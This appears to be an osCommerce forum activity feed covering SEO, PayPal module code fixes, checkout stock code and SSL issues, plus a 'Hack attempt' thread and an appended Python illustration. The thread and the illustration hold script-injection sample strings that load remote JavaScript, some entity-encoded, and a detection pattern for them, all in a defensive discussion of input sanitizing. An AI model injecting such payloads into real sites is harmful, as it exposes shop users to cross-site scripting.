All Activity

  2. Hotclutch

    Domain change, SEO and new oscommerce site version

    The new domain will be considered a new site. If you own both domains then you can implement a 301 redirect of the old domain to the new, that will preserve most of the value built up by the old domain and transfer it onto the new domain. fixed.
  3. Hi all, hope all good there!! I have a question, I want to change the domain of a site from www.sitio1.com to www.sitio2.com, what impact does that have on SEO? What recommendations can you give me? What impacts at SEO level can it have? Any recommendation? I also want to start trying a new version of oscommerce. My question is whether to do it with Frozen (and fix all the bugs that it has), go to EDGE BS4 or wait for H to publish a new official version (hopefully fast!). What would you do? What scares me about moving to BS4 is the addons (of the current addons none is compatible with BS4, and I do not know how to transform them from BS3 to BS4 haha). Besides changing the front page, maybe it would be good to use the Bootstrap V4 Oscommerce Administration v2.3.4.1 CE? Thank you very much, Valqui
  5. MrPhil

    PayPal App v5.018 Log In with PayPal is now dead

    It appears that there are incremental updates past 5.010. Do I have it right that I manually bring Frozen up to 5.010 with the PayPal app, and then apply the incremental updates 5.011, 14, 16, and 18 to be fully 5.018 ready? And then keep an eye open for further 5.xxx updates to come? I guess that HPDL is somehow keeping up to date with PayPal patches.
  6. MrPhil

    PayPal App v5.018 Log In with PayPal is now dead

    I'll look at the PayPal app update some more. I just want to be very careful not to break things! My end goal is still to have Frozen 5.018 out of the box. It's just that Gary's version baked into Frozen is 1) apparently 4.039, and 2) has been updated for various CE-related global changes. It looks like Harald's PayPal app was updated to 5.010, but lacks compatibility with Gary's CE changes. I'm hoping that maybe Gary will adopt the Frozen patch for PayPal 5.018 into Edge. Well, originally PHP had $HTTP_POST_VARS and $HTTP_GET_VARS arrays. These were removed (or at least, deprecated) a long time ago, replaced by $_POST, $_GET, and $_REQUEST. osC kept copies of them (the long names), mostly to avoid the work of changing them, until Gary decided to bite the bullet and change them in his CE work. I think the scoping rules are a little different between the old and new array versions. I seem to recall that the argument was it was better to get in line with the new way of doing things, and fix old add-ons, than to continue to muddle along with the old way of doing things and confusing people.
  7. peterbuzzin

    PayPal App timing out?

    Hey @Smoky Barnable, Think I can help you with this too. The Express button and the Login button are two different beasts. As always, please backup before making any changes and test all changes after.

    Express Button

    The Express button specifics vary depending on how you have it configured, whether it's dynamic or static. If it's static then it is an image that's loaded from paypalobjects.com but is done in the old fashioned way of `<img src="https://www.paypalobjects.com/....">`, so not much can be done about that other than to save the image and then upload it to your server so it's served locally, which will speed up display. You'll need to change the definition for this URL found in includes/apps/paypal/languages/english/modules/EC/EC.php on line 22 approx. All of these changes are based on 5.018 of the stock osC PayPal App (not Frozen etc).

    From:

    ```
    module_ec_button_url = https://www.paypalobjects.com/webstatic/en_US/i/buttons/checkout-logo-medium.png
    ```

    To (as an example):

    ```
    module_ec_button_url = https://www.mydomainname.com/images/buttons/checkout-logo-medium.png
    ```

    However, any auto-updates applied in the future will revert it back to stock. If it's being loaded dynamically then it could be because it's trying to render before the page has fully loaded all resources, and this is the same problem I've found the Login button also suffers from.

    For the next part to work, jQuery must be called on the page before the output of this script in paypal_express.php. In includes/modules/payment/paypal_express.php approx line 220 find:

    ```php
    $string .= <<<EOD
    <span id="ppECButton"></span>
    <script>
      paypal.Button.render({
        env: '{$server}',
        style: {
          size: '${button_size}',
          color: '${button_color}',
          shape: '${button_shape}'
        },
        payment: function(resolve, reject) {
          paypal.request.post('${ppecset_url}')
            .then(function(data) {
              if ((data.token !== undefined) && (data.token.length > 0)) {
                resolve(data.token);
              } else {
                window.location = '${ppecerror_url}';
              }
            })
            .catch(function(err) {
              reject(err);
              window.location = '${ppecerror_url}';
            });
        },
        onAuthorize: function(data, actions) {
          return actions.redirect();
        },
        onCancel: function(data, actions) {
          return actions.redirect();
        }
      }, '#ppECButton');
    </script>
    EOD;
    ```

    And replace with:

    ```php
    $string .= <<<EOD
    <span id="ppECButton"></span>
    <script>
      $( document ).ready(function() {
        paypal.Button.render({
          env: '{$server}',
          style: {
            size: '${button_size}',
            color: '${button_color}',
            shape: '${button_shape}'
          },
          payment: function(resolve, reject) {
            paypal.request.post('${ppecset_url}')
              .then(function(data) {
                if ((data.token !== undefined) && (data.token.length > 0)) {
                  resolve(data.token);
                } else {
                  window.location = '${ppecerror_url}';
                }
              })
              .catch(function(err) {
                reject(err);
                window.location = '${ppecerror_url}';
              });
          },
          onAuthorize: function(data, actions) {
            return actions.redirect();
          },
          onCancel: function(data, actions) {
            return actions.redirect();
          }
        }, '#ppECButton');
      });
    </script>
    EOD;
    ```

    PayPal Login

    THE CHANGES BELOW ARE ONLY FOR THOSE WHO HAVE SWAPPED OVER TO https://www.paypalobjects.com/js/external/connect/api.js LIKE SMOKY HAS (SEE OTHER POST REGARDING PAYPAL LOGIN UPDATE).

    In includes/modules/content/login/templates/paypal_login.php find:

    ```php
    <script type="text/javascript" src="https://www.paypalobjects.com/js/external/connect/api.js"></script>
    <script type="text/javascript">
      paypal.use( ["login"], function(login) {
        login.render ({
    <?php
      if ( OSCOM_APP_PAYPAL_LOGIN_STATUS == '0' ) {
        echo ' "authend": "sandbox",';
      }
      if ( OSCOM_APP_PAYPAL_LOGIN_THEME == 'Neutral' ) {
        echo ' "theme": "neutral",';
      }
    ?>
          "responseType" : "code id_Token",
          "locale": "<?php echo $cm_paypal_login->_app->getDef('module_login_language_locale'); ?>",
          "appid": "<?php echo (OSCOM_APP_PAYPAL_LOGIN_STATUS == '1') ? OSCOM_APP_PAYPAL_LOGIN_LIVE_CLIENT_ID : OSCOM_APP_PAYPAL_LOGIN_SANDBOX_CLIENT_ID; ?>",
          "scopes": "<?php echo implode(' ', $use_scopes); ?>",
          "buttonType" : "CWP",
          "buttonShape" : "rectangle",
          "buttonSize" : "md",
          "fullPage" : "false",
          "containerid": "PayPalLoginButton",
          "returnurl": "<?php echo str_replace('&amp;', '&', tep_href_link(FILENAME_LOGIN, 'action=paypal_login', 'SSL', false)); ?>"
        });
      });
    </script>
    ```

    And replace with:

    ```php
    <script type="text/javascript" src="https://www.paypalobjects.com/js/external/connect/api.js"></script>
    <script type="text/javascript">
      $( document ).ready(function() {
        paypal.use( ["login"], function(login) {
          login.render ({
    <?php
      if ( OSCOM_APP_PAYPAL_LOGIN_STATUS == '0' ) {
        echo ' "authend": "sandbox",';
      }
      if ( OSCOM_APP_PAYPAL_LOGIN_THEME == 'Neutral' ) {
        echo ' "theme": "neutral",';
      }
    ?>
            "responseType" : "code id_Token",
            "locale": "<?php echo $cm_paypal_login->_app->getDef('module_login_language_locale'); ?>",
            "appid": "<?php echo (OSCOM_APP_PAYPAL_LOGIN_STATUS == '1') ? OSCOM_APP_PAYPAL_LOGIN_LIVE_CLIENT_ID : OSCOM_APP_PAYPAL_LOGIN_SANDBOX_CLIENT_ID; ?>",
            "scopes": "<?php echo implode(' ', $use_scopes); ?>",
            "buttonType" : "CWP",
            "buttonShape" : "rectangle",
            "buttonSize" : "md",
            "fullPage" : "false",
            "containerid": "PayPalLoginButton",
            "returnurl": "<?php echo str_replace('&amp;', '&', tep_href_link(FILENAME_LOGIN, 'action=paypal_login', 'SSL', false)); ?>"
          });
        });
      });
    </script>
    ```

    Again, any changes made to the above files will be overwritten if the PayPal auto-update button is used at any point in the future.
  8. peterbuzzin

    PayPal Express ~ Duplicate Orders

    @pete2007 it sure is (but don't tell burt I told you this or he'll get all "Stack Overflow" on me!!). Again, anyone else reading this, this method is specific to pete2007's installation, which doesn't make use of Header Tags modules nor $oscTemplate->getBlocks('footer_scripts'); and everything is hardcoded in template_bottom.php.

    In ext/jquery/main.js find:

    ```js
    /* BOF Prevent multiple form submissions from multiple clicks on checkout_confirmation.php */
    if($('form[name=checkout_confirmation]').length > 0){
      $('form[name=checkout_confirmation]').submit(function(){
    ```

    Replace with:

    ```js
    /* BOF Prevent multiple form submissions from multiple clicks on checkout_confirmation.php and contact_us.php */
    if($('form[name=checkout_confirmation], form[name=contact_us]').length > 0){
      $('form[name=checkout_confirmation], form[name=contact_us]').submit(function(){
    ```

    And then just for the sake of completeness find:

    ```js
    /* EOF Prevent multiple form submissions from multiple clicks */
    ```

    And replace with:

    ```js
    /* EOF Prevent multiple form submissions from multiple clicks on checkout_confirmation.php and contact_us.php */
    ```

    The only caveat is that it will only display one message, i.e. "Loading please wait"; it might have been nicer to have "Sending please wait" for the contact form. But if you want you could change it to just "Please wait", which would apply equally to both forms nicely.
  9. JcMagpie

    Hack attempt - is there a way to prevent this?

    Not sure now, as I was able to bypass the 403 with a simple mod to ascii and hex. Layout gets messed up both in shop and admin and ends up in the db. Search accepted the input. I would say not a big issue but for the fact that I see fake accounts every day. Jack's honey pot has them down to 5 or 6 per attack per day but they still get in. Here is a typical example; filtering them out is nearly impossible as they use real email addresses which clearly don't belong to them. As I did make an account, admin takes the input and outputs the rubbish, as will the db.
  10. peterbuzzin

    PayPal App v5.018 Log In with PayPal is now dead

    @MrPhil The paypal app code is hosted on oscommerce.com and most likely maintained by HPDL. For example, the following URL https://apps.oscommerce.com/index.php?Download&paypal&app&2_300&5_018&update will download the latest version in a zip file. So unless HPDL updates the codebase to reflect changes, it will overwrite when pressing the auto-update button. But it's easy enough to change the auto-update URL so it points to a different repository that contains non-breaking/compatible archives, which will then effectively cut off HPDL updates, but as long as you mirror any updates with code amended for Frozen. (I'm considering doing the same as I've customised the PP modules heavily and if one of my clients hit the update button it would be lost, so I've hidden it for now.)

    What were the reasons for removing them, why is it a bad thing? Seems like a lot of effort to remove something and replace it with something which is basically the same thing.

    There's nothing bad about replacing them other than you'll lose the auto-escaping feature, and any existing modules that would have been compatible would need to be updated (swapping out $HTTP_POST_VARS for $_POST for example) for the sake of continuity. Time could be better spent elsewhere IMO.
  11. In bm_category.php use: `$category_titel = $OSCOM_CategoryTree->getData($current_category_id, 'name');` You just have to add a check if $current_category_id is not empty or zero and use MODULE_BOXES_CATEGORIES_BOX_TITLE for that case.
  12. raiwa

    Hack attempt - is there a way to prevent this?

    I guess this input example has been cleaned with tep_db_prepare_input:

    ```php
    function tep_db_prepare_input($string) {
      if (is_string($string)) {
        return trim(tep_sanitize_string(stripslashes($string)));
      } elseif (is_array($string)) {
        foreach($string as $key => $value) {
          $string[$key] = tep_db_prepare_input($value);
        }
        return $string;
      } else {
        return $string;
      }
    }
    ```

    which uses tep_sanitize_string:

    ```php
    function tep_sanitize_string($string) {
      $patterns = array ('/ +/','/[<>]/');
      $replace = array (' ', '_');
      return preg_replace($patterns, $replace, trim($string));
    }
    ```

    Whether it is enough, I do not know either.
  13. Hi everyone, sorry I just saw this today. At my checkout_process.php it's like this:

    ```php
    <?php
    //....
    for ($i=0, $n=sizeof($order->products); $i<$n; $i++) {
    //++++ QT Pro: Begin Changed code
      $products_stock_attributes=null;
      if (STOCK_LIMITED == 'true') {
        $products_attributes = $order->products[$i]['attributes'];
    //    if (DOWNLOAD_ENABLED == 'true') {
    //++++ QT Pro: End Changed Code
          $stock_query_raw = "SELECT products_quantity, pad.products_attributes_filename FROM " . TABLE_PRODUCTS . " p LEFT JOIN " . TABLE_PRODUCTS_ATTRIBUTES . " pa ON p.products_id=pa.products_id LEFT JOIN " . TABLE_PRODUCTS_ATTRIBUTES_DOWNLOAD . " pad ON pa.products_attributes_id=pad.products_attributes_id WHERE p.products_id = '" . tep_get_prid($order->products[$i]['id']) . "'";
    // Will work with only one option for downloadable products
    // otherwise, we have to build the query dynamically with a loop
          $products_attributes = (isset($order->products[$i]['attributes'])) ? $order->products[$i]['attributes'] : '';
          if (is_array($products_attributes)) {
            $stock_query_raw .= " AND pa.options_id = '" . (int)$products_attributes[0]['option_id'] . "' AND pa.options_values_id = '" . (int)$products_attributes[0]['value_id'] . "'";
          }
          $stock_query = tep_db_query($stock_query_raw);
      } else {
        $stock_query = tep_db_query("select products_quantity from " . TABLE_PRODUCTS . " where products_id = '" . tep_get_prid($order->products[$i]['id']) . "'");
      }
      if (tep_db_num_rows($stock_query) > 0) {
        $stock_values = tep_db_fetch_array($stock_query);
    // do not decrement quantities if products_attributes_filename exists
        $actual_stock_bought = $order->products[$i]['qty'];
        $download_selected = false;
        if ((DOWNLOAD_ENABLED == 'true') && isset($stock_values['products_attributes_filename']) && tep_not_null($stock_values['products_attributes_filename'])) {
          $download_selected = true;
          $products_stock_attributes='$$DOWNLOAD$$';
        }
    // If not downloadable and attributes present, adjust attribute stock
        if (!$download_selected && is_array($products_attributes)) {
          $all_nonstocked = true;
          $products_stock_attributes_array = array();
          foreach ($products_attributes as $attribute) {
            if ($attribute['track_stock'] == 1) {
              $products_stock_attributes_array[] = $attribute['option_id'] . "-" . $attribute['value_id'];
              $all_nonstocked = false;
            }
          }
          if ($all_nonstocked) {
            $actual_stock_bought = $order->products[$i]['qty'];
          } else {
            asort($products_stock_attributes_array, SORT_NUMERIC);
            $products_stock_attributes = implode(",", $products_stock_attributes_array);
            $attributes_stock_query = tep_db_query("select products_stock_quantity from " . TABLE_PRODUCTS_STOCK . " where products_stock_attributes = '$products_stock_attributes' AND products_id = '" . tep_get_prid($order->products[$i]['id']) . "'");
            if (tep_db_num_rows($attributes_stock_query) > 0) {
              $attributes_stock_values = tep_db_fetch_array($attributes_stock_query);
              $attributes_stock_left = $attributes_stock_values['products_stock_quantity'] - $order->products[$i]['qty'];
              tep_db_query("update " . TABLE_PRODUCTS_STOCK . " set products_stock_quantity = '" . $attributes_stock_left . "' where products_stock_attributes = '$products_stock_attributes' AND products_id = '" . tep_get_prid($order->products[$i]['id']) . "'");
              $actual_stock_bought = ($attributes_stock_left < 1) ? $attributes_stock_values['products_stock_quantity'] : $order->products[$i]['qty'];
            } else {
              $attributes_stock_left = 0 - $order->products[$i]['qty'];
              tep_db_query("insert into " . TABLE_PRODUCTS_STOCK . " (products_id, products_stock_attributes, products_stock_quantity) values ('" . tep_get_prid($order->products[$i]['id']) . "', '" . $products_stock_attributes . "', '" . $attributes_stock_left . "')");
              $actual_stock_bought = 0;
            }
          }
        }
    //    $stock_query = tep_db_query("select products_quantity from " . TABLE_PRODUCTS . " where products_id = '" . tep_get_prid($order->products[$i]['id']) . "'");
    //  }
    //  if (tep_db_num_rows($stock_query) > 0) {
    //    $stock_values = tep_db_fetch_array($stock_query);
    // do not decrement quantities if products_attributes_filename exists
        if (!$download_selected) {
          $stock_left = $stock_values['products_quantity'] - $actual_stock_bought;
          tep_db_query("UPDATE " . TABLE_PRODUCTS . " SET products_quantity = products_quantity - '" . $actual_stock_bought . "' WHERE products_id = '" . tep_get_prid($order->products[$i]['id']) . "'");
    //++++ QT Pro: End Changed Code
        }
      }
    //....
    ?>
    ```
  14. Thank you, that was a really simple way to do it. So what I'm trying to bring in now: left navigation now shows only the current level we're at, selected using the method you've shown me: `global $oscTemplate, $cPath, $current_category_id;` But in the header for the left menu, I wish it to say Category: "current category name". So I need to pull in the current category name there. So it can't be just getTree, it needs to be the selected category name. I'll be looking for the variable to put, but if you are able to help or push me in the right direction that will be great.
  15. JcMagpie

    Hack attempt - is there a way to prevent this?

    Both blocked by server with 403 error page.
  16. puddlec

    Hack attempt - is there a way to prevent this?

    How would it handle stuff like &lt;script src=&quot;google.com&quot;&gt; and &#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x20;&#x73;&#x72;&#x63;&#x3d;&#x22;&#x67;&#x6f;&#x6f;&#x67;&#x6c;&#x65;&#x2e;&#x63;&#x6f;&#x6d;&#x22;&#x3e;
  17. greasemonkey

    Hack attempt - is there a way to prevent this?

    @raiwa is this cleaned by tep_draw_input_field (which is sanitizing with stripslashes)? And if so... is it enough? This is definitely out of my skill range - it really is just a question. Reading about SQL injections (again I'm not sure I understand it clearly) should we not be using PDO (as in 2.4) or at minimum htmlspecialchars? Source: https://stackoverflow.com/questions/29678806/secure-all-inputs-in-php-form
  18. MrPhil

    Security checks gone

    Don't forget to patch Frozen (see my signature). I don't think there is a Dutch language pack specifically for this version, but you might find one that is close (a little update and translation work needed by you). At worst, you'll have to compare the Frozen language files side-by-side with whatever Dutch version you have, and copy over line-by-line, and translate the rest. If you do this successfully, and there is no existing Dutch pack, please consider offering it as a language add-on. Be careful that your editor doesn't add a Byte Order Mark to edited files! As far as layout changes go, some of this might be possible in user.css, but some might require PHP code changes. It all depends on what you want to do. Good luck, and let us know how it turns out!
  19. You have to do it yourself (it's not a one-button install in Softaculous, etc.), but if you pay your host enough money, they could probably be persuaded to do it for you. It's a manual install of the code (and a new database), and copy over and update your data (including the database). I would suggest setting up a private password-protected directory on your site and installing there, to try it out. You can play with the default sample data to see if you want to go further, then practice on a copy of your store's database (which will need to be updated). See if you need to install any add-ons, do any custom code changes, or just tweak the CSS in user.css file. You're going to have to do this eventually, when your host upgrades to PHP 7, so you might as well dip your toes in the water now and get the feel of things on a safe play system, before it becomes an emergency situation. From your questions, it sounds like you know very little about running a website (the mechanics behind it), so you might want to bring someone on board to help you with all this.
  20. raiwa

    Hack attempt - is there a way to prevent this?

    Malicious/problematic code has already been filtered out in this example: Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC 244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_
  21. GoCastaway58

    Security checks gone

    I already installed a clean "Frozen" on my server and it works perfectly as far as I can see. The layout is nicely responsive, but when I am going to use it I am gonna make some changes in the layout etc, and I also need it in Dutch, so I have to look if the language pack that I have is up to date. In the next weeks I am going to work on it, will keep you updated.
  22. 4girlsandaguy

    Admin page not logging secure, not displaying correct

    That did it. Looks the way it should.......Thank you!!!!
  23. JcMagpie

    Admin page not logging secure, not displaying correct

    This will be down to you being on a shared server. Looks like your host has turned on SSL on the server, just check your config file in admin/includes and make sure all http statements are changed to https. You will need to check this for every link in your code as any that still call http will cause problems of mixed content.
  24. 4girlsandaguy

    Admin page not logging secure, not displaying correct

    Mr. Phil, how do I upgrade this? Is this something I have to have my hosting company do or can I do this myself?
  25. 4girlsandaguy

    Admin page not logging secure, not displaying correct

    I checked the browser code. It looks just like what you have. But what is happening is that the .css and .js files are all blocked because it is an insecure site. My shopping cart is secure but for some reason my admin page is not. I will have my hosting site address this and follow up here. Thanks for the insight and info.
  26. A few general notes: did your host just upgrade PHP (to 5.6)? osC 2.3.4 (official release) is a bit long in the tooth, and has been known to have problems with PHP versions above 5.4 or so, although I don't recall seeing problems this severe. Did you get moved to a different server? Did your host make any other changes, such as forcing SSL? It's not uncommon for one hand (server support) to make major changes and not tell the other hand (customer support) what they did. Could you have been hacked (any files show inexplicably recent updates)? Did you make some "innocent little change"? By the way, PHP 5.6 is no longer supported (ditto 7.0) and 7.1 won't be soon, so try to upgrade your store before you run into severe problems on the next PHP upgrade. The only current osCommerce is "Frozen" (or "Edge", if you're adventurous) -- see link for it (plus patches) below in my signature. The official osC releases are years behind.
  27. JcMagpie

    Hack attempt - is there a way to prevent this?

    So going back to the original post of what if someone uses a form to inject script into the db? Looks like no cleaning is done before input is saved to db in official osC or CE. Script used in create account form is simply passed over to each page and saved into db. No scrubbing is done when it is pulled out to display, and db is just taking the data presented to it. The test script used was the one originally posted and used as a test (can do no harm as it is not active on its own): Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC So looks like some method of scrubbing all forms and input boxes is needed, not just the search. Or have I missed something?
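A Python port of the two filters raiwa quoted, added here as an illustration (not osCommerce's own code), run over a constructed sign-up form: it shows that the stored string (the thread's test sample, with the script host replaced by a reserved example domain) breaks out of an unescaped value="..." attribute while escaping at output keeps it contained, and adds a review check over already-stored values that decodes HTML entities first, so the encoded form puddlec asked about is flagged as well. Everything except the two ported functions is an assumed name.

```python
import html
import re

# Python port (illustration only, not osCommerce's own code) of the two input
# filters quoted in the thread. The PHP original also calls stripslashes();
# that step is omitted here because it only undoes magic-quotes escaping.
def tep_sanitize_string(s: str) -> str:
    s = re.sub(r" +", " ", s.strip())   # pattern '/ +/'   -> ' '
    return re.sub(r"[<>]", "_", s)      # pattern '/[<>]/' -> '_'

def tep_db_prepare_input(value):
    if isinstance(value, str):
        return tep_sanitize_string(value).strip()
    if isinstance(value, dict):
        return {k: tep_db_prepare_input(v) for k, v in value.items()}
    return value

# Output-side escaping, the step greasemonkey asks about (htmlspecialchars with
# ENT_QUOTES in PHP terms). It is applied when the value is echoed, not on input.
def render_name_field(stored: str, escape: bool) -> str:
    """Build the admin 'first name' input the way a template echoes a DB value."""
    shown = html.escape(stored, quote=True) if escape else stored
    return f'<input type="text" name="firstname" value="{shown}">'

_INTACT = re.compile(r'<input type="text" name="firstname" value="[^"<>]*">')

def attribute_intact(markup: str) -> bool:
    """True when the stored value stayed inside the value="..." attribute."""
    return _INTACT.fullmatch(markup) is not None

# Coarse review check for rows already in the customers table: decode entities
# first so an encoded payload (&#x3c;script ...) is compared in its real form,
# then look for the markers the thread's sample still shows after sanitizing.
_SUSPECT = re.compile(r"script\b|\bsrc\s*=|javascript:|\bon\w+\s*=", re.I)

def looks_injected(stored: str) -> bool:
    return _SUSPECT.search(html.unescape(stored)) is not None

# Constructed samples. The first mirrors the thread's test string with the
# script host swapped for a reserved example domain; the second is the
# entity-encoded form from puddlec's question.
SIGNUP_FORM = {
    "firstname": 'Bob Smith"><sCRiPt sRC=//example.invalid/i></sCrIpT>',
    "street": "&#x3c;script src=&quot;google.com&quot;&#x3e;",
    "city": "Springfield",
}

def process_signup(form: dict) -> dict:
    """What reaches the database after tep_db_prepare_input."""
    return tep_db_prepare_input(form)

if __name__ == "__main__":
    stored = process_signup(SIGNUP_FORM)
    for field, value in stored.items():
        print(f"{field:10} stored={value!r}")
        print(f"{'':10} unescaped attribute intact: {attribute_intact(render_name_field(value, False))}")
        print(f"{'':10} escaped attribute intact:   {attribute_intact(render_name_field(value, True))}")
        print(f"{'':10} flagged on review:          {looks_injected(value)}")
```

The input filter turns `<` and `>` into `_` but leaves the `"` that closes the attribute, which is why the sample still breaks an unescaped template; the entity-encoded street value passes the input filter untouched and is only caught once entities are decoded before matching.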